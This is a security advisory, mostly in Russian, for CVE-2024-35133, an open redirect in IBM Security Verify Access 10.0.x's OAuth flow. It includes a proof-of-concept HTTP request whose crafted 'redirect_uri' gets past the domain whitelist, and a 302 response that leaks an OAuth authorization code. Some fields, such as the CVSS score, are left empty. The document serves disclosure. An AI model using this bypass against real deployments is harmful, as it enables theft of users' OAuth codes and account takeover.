
Security Bulletin for CVE-2024-35133 - With PoC
Revision: 1.0
Воздействие:
Убедив жертву посетить специально созданный веб-сайт, удаленный злоумышленник может использовать эту уязвимость для подмены отображаемого URL и перенаправления пользователя на вредоносный сайт. Это может позволить злоумышленнику получить информацию высокой степени важности или провести дальнейшие атаки на жертву.
Серьезность:
Оценка CVSS:
CVE-ID: CVE-2024-35133
Vendor: IBM
Затронутые продукты:
Затронутые версии: 10.0.0 - 10.0.8
IBM Security Verify Access — это комплексное решение для управления политиками авторизации и сетевой безопасности. Оно обеспечивает сквозную защиту ресурсов в географически распределенных интрасетях и экстрасетях.
Некоторые ключевые возможности включают:
В ходе тестирования на проникновение OAuth-потока для клиента была обнаружена уязвимость открытого перенаправления, позволяющая утечку переменной "code" OAuth.
Обходя логику парсера, отвечающего за проверку параметра "redirect_uri" во время OAuth-потока (используя RFC 3986), злоумышленник мог манипулировать фильтром белого списка доменов в IBM Security Verify Access. Это приводило к открытому перенаправлению на любой произвольный домен, контролируемый злоумышленником. Жертва могла быть перенаправлена на вредоносный сайт, при этом домен выглядел доверенным.
Это может привести к раскрытию конфиденциальной информации, такой как токен "code" OAuth, или к дальнейшим атакам на жертву.
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
HTTP/1.1 302 Found
content-language: en-US
date: Tue, 19 Mar 2024 16:04:35 GMT
location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-frame-options: DENY
x-content-type-options: nosniff
cache-control: no-store
x-xss-protection: 1; mode=block
x-permitted-cross-domain-policies: none
cross-origin-resource-policy: same-site
content-security-policy: frame-ancestors 'none'
referrer-policy: no-referrer-when-downgrade
strict-transport-security: max-age=31536000; includeSubDomains
pragma: no-cache
Content-Length: 0.
Обратитесь к бюллетеню безопасности IBM 7166712 для получения информации об исправлениях, обновлениях или рекомендуемых обходных путях.
См. Ссылки для более подробной информации.
Эта уязвимость была обнаружена и сообщена:
Copyright (c) 2024 Giulio Garzia "Ozozuz"
Разрешается электронное распространение данного уведомления. Оно не может быть отредактировано без явного письменного согласия. Для получения разрешения на перепечатку этого уведомления в других средствах массовой информации обращайтесь к автору.
Отказ от ответственности: Информация в данном рекомендательном сообщении точна на момент публикации на основе имеющихся данных. Никаких гарантий не предоставляется. Ни автор, ни издатель не несут ответственности за прямой, косвенный или последующий ущерб, возникший в результате использования этой информации.